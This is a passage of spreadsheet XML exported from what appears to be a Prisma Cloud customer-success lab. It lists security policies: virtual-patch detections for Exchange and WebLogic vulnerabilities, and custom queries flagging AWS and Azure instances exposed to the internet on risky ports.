      <c r="L3446" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3446" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3446" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3446" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3446" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3446" t="inlineStr"/>
      <c r="R3446" t="inlineStr"/>
      <c r="S3446" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3446" t="b">
        <v>0</v>
      </c>
      <c r="U3446" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3446" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3446" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
Microsoft Exchange Server Remote Code Execution Vulnerability</t>
        </is>
      </c>
      <c r="X3446"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6" t="inlineStr"/>
      <c r="Z3446" t="inlineStr"/>
      <c r="AA3446" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3446" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3446" t="inlineStr"/>
      <c r="AD3446" t="b">
        <v>1</v>
      </c>
      <c r="AE3446" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3446" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3446"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6" t="inlineStr">
        <is>
          <t>25c4444c-34e8-4c45-a82f-f83ed249865f</t>
        </is>
      </c>
      <c r="AI3446" t="inlineStr"/>
      <c r="AJ3446" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3446" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3447">
      <c r="A3447" t="inlineStr"/>
      <c r="B3447" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3447" s="2" t="inlineStr"/>
      <c r="D3447" t="inlineStr"/>
      <c r="E3447" t="inlineStr"/>
      <c r="F3447" t="inlineStr"/>
      <c r="G3447" t="b">
        <v>1</v>
      </c>
      <c r="H344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47" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3447" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3447" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2019-2725, CVE-2019-2729 - WebLogic) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3447" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3447" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3447" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3447" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3447" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3447" t="inlineStr"/>
      <c r="R3447" t="inlineStr"/>
      <c r="S3447" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3447" t="b">
        <v>0</v>
      </c>
      <c r="U3447" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3447" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3447" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.</t>
        </is>
      </c>
      <c r="X3447" t="inlineStr">
        <is>
          <t>1. Deploy a Prisma Compute Defender if the workload is currently not protected.
2. Go to the Compute tab.
3. Create a WAAS rule by selecting the WAAS sub-menu item under the Defend menu.
4. Choose the relevant tab for the workload.
5. Follow the instructions to deploy the in-line rule found at https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin-compute/waas/deploy_waas.
6. Set the protection effect in the created WAAS rule to "Prevent".</t>
        </is>
      </c>
      <c r="Y3447" t="inlineStr"/>
      <c r="Z3447" t="inlineStr"/>
      <c r="AA3447" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3447" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3447" t="inlineStr"/>
      <c r="AD3447" t="b">
        <v>1</v>
      </c>
      <c r="AE3447" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3447" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG344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47" t="inlineStr">
        <is>
          <t>05e323d1-61ef-47c9-981e-6ccb691cbe68</t>
        </is>
      </c>
      <c r="AI3447" t="inlineStr"/>
      <c r="AJ3447" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3447" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3448">
      <c r="A3448" t="inlineStr"/>
      <c r="B3448" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3448" s="2" t="inlineStr"/>
      <c r="D3448" t="inlineStr"/>
      <c r="E3448" t="inlineStr"/>
      <c r="F3448" t="inlineStr"/>
      <c r="G3448" t="b">
        <v>0</v>
      </c>
      <c r="H344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48" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3448" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3448" t="inlineStr">
        <is>
          <t>na-1 (exposed ELBs)</t>
        </is>
      </c>
      <c r="L3448" t="inlineStr"/>
      <c r="M3448" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3448" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3448" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3448" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3448" t="inlineStr"/>
      <c r="R3448" t="inlineStr"/>
      <c r="S3448" t="inlineStr"/>
      <c r="T3448" t="b">
        <v>0</v>
      </c>
      <c r="U3448" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3448" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3448" t="inlineStr">
        <is>
          <t>na-1 (exposed ELBs)</t>
        </is>
      </c>
      <c r="X3448" t="inlineStr"/>
      <c r="Y3448" t="inlineStr"/>
      <c r="Z3448" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and dest.resource.type = 'Interface' and dest.cloud.type = 'AWS' and dest.network.interface.owner in ( 'amazon-elb' )</t>
        </is>
      </c>
      <c r="AA3448" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3448" t="inlineStr">
        <is>
          <t>2024-09-13 17:10:14</t>
        </is>
      </c>
      <c r="AC3448" t="inlineStr"/>
      <c r="AD3448" t="b">
        <v>0</v>
      </c>
      <c r="AE3448" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3448" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG344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48" t="inlineStr">
        <is>
          <t>8f7ab24c-8b15-4f23-a202-5b0d397ad8bb</t>
        </is>
      </c>
      <c r="AI3448" t="inlineStr">
        <is>
          <t>e38c0f4d-e260-4079-af86-ff6fd97c9c51</t>
        </is>
      </c>
      <c r="AJ3448" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3448" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3449">
      <c r="A3449" t="inlineStr"/>
      <c r="B3449" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3449" s="2" t="inlineStr"/>
      <c r="D3449" t="inlineStr"/>
      <c r="E3449" t="inlineStr"/>
      <c r="F3449" t="inlineStr"/>
      <c r="G3449" t="b">
        <v>0</v>
      </c>
      <c r="H344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49" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3449" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3449" t="inlineStr">
        <is>
          <t>na-2 (exposed ec2s)</t>
        </is>
      </c>
      <c r="L3449" t="inlineStr"/>
      <c r="M3449" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3449" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3449" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3449" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3449" t="inlineStr"/>
      <c r="R3449" t="inlineStr"/>
      <c r="S3449" t="inlineStr"/>
      <c r="T3449" t="b">
        <v>0</v>
      </c>
      <c r="U3449" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3449" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3449" t="inlineStr">
        <is>
          <t>na-2 (exposed ec2s)</t>
        </is>
      </c>
      <c r="X3449" t="inlineStr"/>
      <c r="Y3449" t="inlineStr"/>
      <c r="Z3449" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and dest.resource.type = 'Instance' and dest.cloud.type = 'AWS' and effective.action = 'Allow'</t>
        </is>
      </c>
      <c r="AA3449" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3449" t="inlineStr">
        <is>
          <t>2024-09-13 17:19:09</t>
        </is>
      </c>
      <c r="AC3449" t="inlineStr"/>
      <c r="AD3449" t="b">
        <v>0</v>
      </c>
      <c r="AE3449" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3449" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG344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49" t="inlineStr">
        <is>
          <t>a6e84ada-4844-4900-9971-5a5b3dc851e7</t>
        </is>
      </c>
      <c r="AI3449" t="inlineStr">
        <is>
          <t>2ce09d15-9224-4651-9055-57863673a478</t>
        </is>
      </c>
      <c r="AJ3449" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3449" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3450">
      <c r="A3450" t="inlineStr"/>
      <c r="B3450" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3450" s="2" t="inlineStr"/>
      <c r="D3450" t="inlineStr"/>
      <c r="E3450" t="inlineStr"/>
      <c r="F3450" t="inlineStr"/>
      <c r="G3450" t="b">
        <v>1</v>
      </c>
      <c r="H345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50" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3450" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3450" t="inlineStr">
        <is>
          <t>Azure VM has port 8080 exposed publicly</t>
        </is>
      </c>
      <c r="L3450" t="inlineStr"/>
      <c r="M3450" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3450" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3450" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3450" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3450" t="inlineStr"/>
      <c r="R3450" t="inlineStr"/>
      <c r="S3450" t="inlineStr"/>
      <c r="T3450" t="b">
        <v>0</v>
      </c>
      <c r="U3450" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3450" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3450" t="inlineStr"/>
      <c r="X3450" t="inlineStr">
        <is>
          <t>Please close the exposed port</t>
        </is>
      </c>
      <c r="Y3450" t="inlineStr"/>
      <c r="Z3450" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'Instance' and dest.cloud.type = 'AZURE' and protocol.ports in ( 'tcp/8080', 'udp/8080' )</t>
        </is>
      </c>
      <c r="AA3450" t="inlineStr">
        <is>
          <t>Jason Dempsey</t>
        </is>
      </c>
      <c r="AB3450" t="inlineStr">
        <is>
          <t>2024-09-24 18:24:42</t>
        </is>
      </c>
      <c r="AC3450" t="inlineStr"/>
      <c r="AD3450" t="b">
        <v>0</v>
      </c>
      <c r="AE3450" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3450" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG345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50" t="inlineStr">
        <is>
          <t>88e3fadb-2d9f-4ae9-93ca-def3f74ad807</t>
        </is>
      </c>
      <c r="AI3450" t="inlineStr">
        <is>
          <t>91204d2a-5e88-46f3-8de7-90bd918e679b</t>
        </is>
      </c>
      <c r="AJ3450" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3450" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3451">
      <c r="A3451" t="inlineStr"/>
      <c r="B3451" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3451" s="2" t="inlineStr"/>
      <c r="D3451" t="inlineStr"/>
      <c r="E3451" t="inlineStr"/>
      <c r="F3451" t="inlineStr"/>
      <c r="G3451" t="b">
        <v>1</v>
      </c>
      <c r="H345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51" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3451" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3451" t="inlineStr">
        <is>
          <t>Clone test :  Azure Virtual Machine with network path from the untrust internet source on ports with high risk</t>
        </is>
      </c>
      <c r="L3451" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3451" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3451" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3451" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3451" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3451" t="inlineStr"/>
      <c r="R3451" t="inlineStr"/>
      <c r="S3451" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="T3451" t="b">
        <v>0</v>
      </c>
      <c r="U3451" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3451" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3451" t="inlineStr">
        <is>
          <t>This is a cloned policy for specific purposes.</t>
        </is>
      </c>
      <c r="X3451" t="inlineStr">
        <is>
          <t>Restrict network path from the internet to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add the IP addresses from Trusted IP Addresses.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t>
        </is>
      </c>
      <c r="Y3451" t="inlineStr"/>
      <c r="Z3451" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'Instance' and dest.cloud.type = 'Azure' and protocol.ports in ('tcp/20', 'tcp/21','tcp/23','tcp/25', 'tcp/110', 'tcp/135', 'tcp/143', 'tcp/445', 'tcp/1433:1434', 'tcp/3000', 'tcp/3306', 'tcp/4333', 'tcp/5000', 'tcp/5432', 'tcp/5500', 'tcp/5601', 'tcp/8080', 'tcp/8088', 'tcp/8888', 'tcp/9200', 'tcp/9300') and dest.resource.state = 'Active' and dest.instance.name = 'sara-vm'</t>
        </is>
      </c>
      <c r="AA3451" t="inlineStr">
        <is>
          <t>Matias Keib</t>
        </is>
      </c>
      <c r="AB3451" t="inlineStr">
        <is>
          <t>2024-10-25 17:20:45</t>
        </is>
      </c>
      <c r="AC3451" t="inlineStr"/>
      <c r="AD3451" t="b">
        <v>0</v>
      </c>
      <c r="AE3451" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3451" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG345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51" t="inlineStr">
        <is>
          <t>fc709982-36cc-4443-8752-61f21f0e5638</t>
        </is>
      </c>
      <c r="AI3451" t="inlineStr">
        <is>
          <t>1fe4b604-4f85-440a-9588-de89553cbce6</t>
        </is>
      </c>
      <c r="AJ3451" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3451" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3452">
      <c r="A3452" t="inlineStr"/>
      <c r="B3452" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3452" s="2" t="inlineStr"/>
      <c r="D3452" t="inlineStr"/>
      <c r="E3452" t="inlineStr"/>
      <c r="F3452" t="inlineStr"/>
      <c r="G3452" t="b">
        <v>0</v>
      </c>
      <c r="H345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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3452" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3452" t="inlineStr">
        <is>
          <t>Tadenugba copy of Azure VM instance in running state that is internet reachable with unrestricted access (0.0.0.0/0) other than HTTP/HTTPS port</t>
        </is>
      </c>
      <c r="L3452" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3452" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3452" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3452" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3452" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3452" t="inlineStr"/>
      <c r="R3452" t="inlineStr"/>
      <c r="S3452" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T3452" t="b">
        <v>0</v>
      </c>
      <c r="U3452" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3452" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3452" t="inlineStr">
        <is>
          <t>This policy identifies azure VM instances in running state that are internet reachable with unrestricted access (0.0.0.0/0) other than HTTP/HTTPS port. VM instances with unrestricted access to the internet may enable bad actors to use brute force on a system to gain unauthorised access to the entire network. As a best practice, restrict traffic from unknown IP addresses and limit the access to known hosts, services, or specific entities.
NOTE: We are excluding the HTTP-80 and HTTPs-443 web ports as these are Internet-facing ports with legitimate traffic.</t>
        </is>
      </c>
      <c r="X3452" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict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Network Security Group rules can be made more restrictive.
 b) Move the instance inside a restrictive subnet if the instance does not need to be publicly accessible.
 c) Remove or disassociate the public IP assigned to the respective instance.</t>
        </is>
      </c>
      <c r="Y3452" t="inlineStr"/>
      <c r="Z3452" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'AZURE' and dest.resource.state = 'Active'</t>
        </is>
      </c>
      <c r="AA3452" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3452" t="inlineStr">
        <is>
          <t>2024-09-13 16:52:44</t>
        </is>
      </c>
      <c r="AC3452" t="inlineStr"/>
      <c r="AD3452" t="b">
        <v>0</v>
      </c>
      <c r="AE3452" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3452" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG345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2" t="inlineStr">
        <is>
          <t>e4fd5647-7284-4d92-95b1-6b29339ca16f</t>
        </is>
      </c>
      <c r="AI3452" t="inlineStr">
        <is>
          <t>1c8f24af-30b3-4bb7-8073-f41bbbb7214d</t>
        </is>
      </c>
      <c r="AJ3452" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3452" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3453">
      <c r="A3453" t="inlineStr"/>
      <c r="B3453" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3453" s="2" t="inlineStr"/>
      <c r="D3453" t="inlineStr"/>
      <c r="E3453" t="inlineStr"/>
      <c r="F3453" t="inlineStr"/>
      <c r="G3453" t="b">
        <v>0</v>
      </c>
      <c r="H345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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3453" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3453" t="inlineStr">
        <is>
          <t>stella test_network</t>
        </is>
      </c>
      <c r="L3453" t="inlineStr"/>
      <c r="M3453" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3453" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3453" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3453" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3453" t="inlineStr"/>
      <c r="R3453" t="inlineStr"/>
      <c r="S3453" t="inlineStr"/>
      <c r="T3453" t="b">
        <v>0</v>
      </c>
      <c r="U3453" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3453" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3453" t="inlineStr"/>
      <c r="X3453" t="inlineStr"/>
      <c r="Y3453" t="inlineStr"/>
      <c r="Z3453" t="inlineStr">
        <is>
          <t>config from network where source.resource.type = 'Interface' and source.cloud.type = 'AZURE' and dest.resource.type = 'Service Endpoint' and dest.cloud.type = 'AZURE' and source.vpc.id = 'string' and dest.vpc.id in ( 'string' )</t>
        </is>
      </c>
      <c r="AA3453" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3453" t="inlineStr">
        <is>
          <t>2024-09-13 16:55:09</t>
        </is>
      </c>
      <c r="AC3453" t="inlineStr"/>
      <c r="AD3453" t="b">
        <v>0</v>
      </c>
      <c r="AE3453" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3453" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG345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3" t="inlineStr">
        <is>
          <t>763d91b5-fadf-4f69-a318-18aea442e2d6</t>
        </is>
      </c>
      <c r="AI3453" t="inlineStr">
        <is>
          <t>14ec3839-5e2e-4ab0-8501-ec1305efbb6f</t>
        </is>
      </c>
      <c r="AJ3453" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3453" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3454">
      <c r="A3454" t="inlineStr"/>
      <c r="B3454" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3454" s="2" t="inlineStr"/>
      <c r="D3454" t="inlineStr"/>
      <c r="E3454" t="inlineStr"/>
      <c r="F3454" t="inlineStr"/>
      <c r="G3454" t="b">
        <v>0</v>
      </c>
      <c r="H345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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3454" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3454" t="inlineStr">
        <is>
          <t>AWS EC2 instance that is internet reachable with unrestricted access (0.0.0.0/0) on ports 80/443_RL</t>
        </is>
      </c>
      <c r="L3454" t="inlineStr"/>
      <c r="M3454" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3454" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3454" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3454" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3454" t="inlineStr"/>
      <c r="R3454" t="inlineStr"/>
      <c r="S3454" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="T3454" t="b">
        <v>0</v>
      </c>
      <c r="U3454" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3454" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3454" t="inlineStr">
        <is>
          <t>List of AWS EC2 instances that are internet reachable with unrestricted access (0.0.0.0/0) on HTTP/HTTPS ports</t>
        </is>
      </c>
      <c r="X3454" t="inlineStr"/>
      <c r="Y3454" t="inlineStr"/>
      <c r="Z3454" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'AWS' and protocol.ports in ( 'tcp/80' , 'tcp/443' )</t>
        </is>
      </c>
      <c r="AA3454" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3454" t="inlineStr">
        <is>
          <t>2024-09-13 18:47:12</t>
        </is>
      </c>
      <c r="AC3454" t="inlineStr"/>
      <c r="AD3454" t="b">
        <v>0</v>
      </c>
      <c r="AE3454" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3454" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG345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4" t="inlineStr">
        <is>
          <t>f91fa078-3142-4686-92b0-bcd36604cf30</t>
        </is>
      </c>
      <c r="AI3454" t="inlineStr">
        <is>
          <t>186c4a23-2f93-4b6f-8844-ba9f0006c115</t>
        </is>
      </c>
      <c r="AJ3454" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3454" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3455">
      <c r="A3455" t="inlineStr"/>
      <c r="B3455" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3455" s="2" t="inlineStr"/>
      <c r="D3455" t="inlineStr"/>
      <c r="E3455" t="inlineStr"/>
      <c r="F3455" t="inlineStr"/>
      <c r="G3455" t="b">
        <v>0</v>
      </c>
      <c r="H345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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3455" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3455" t="inlineStr">
        <is>
          <t>Cloned new will delete: AWS EC2 instance that is internet reachable with unrestricted access (0.0.0.0/0) on Admin ports 22/3389_RL</t>
        </is>
      </c>
      <c r="L3455" t="inlineStr"/>
      <c r="M3455" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3455" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3455" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3455" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3455" t="inlineStr"/>
      <c r="R3455" t="inlineStr"/>
      <c r="S3455" t="inlineStr">
        <is>
          <t>openports</t>
        </is>
      </c>
      <c r="T3455" t="b">
        <v>0</v>
      </c>
      <c r="U3455" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3455" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3455" t="inlineStr">
        <is>
          <t>List of AWS EC2 instances that are internet reachable with unrestricted access (0.0.0.0/0) to Admin ports (22 / 3389). EC2 instances with unrestricted access to the internet for admin ports may enable bad actors to use brute force on a system to gain unauthorised access to the entire network. As a best practice, restrict traffic from unknown IP addresses and limit access to known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3455" t="inlineStr"/>
      <c r="Y3455" t="inlineStr"/>
      <c r="Z3455" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'AWS' and dest.resource.state = 'Active' and protocol.ports in ( 'tcp/22', 'tcp/3389' )</t>
        </is>
      </c>
      <c r="AA3455" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3455" t="inlineStr">
        <is>
          <t>2024-09-13 16:49:35</t>
        </is>
      </c>
      <c r="AC3455" t="inlineStr"/>
      <c r="AD3455" t="b">
        <v>0</v>
      </c>
      <c r="AE3455" t="inlineStr">
        <is>
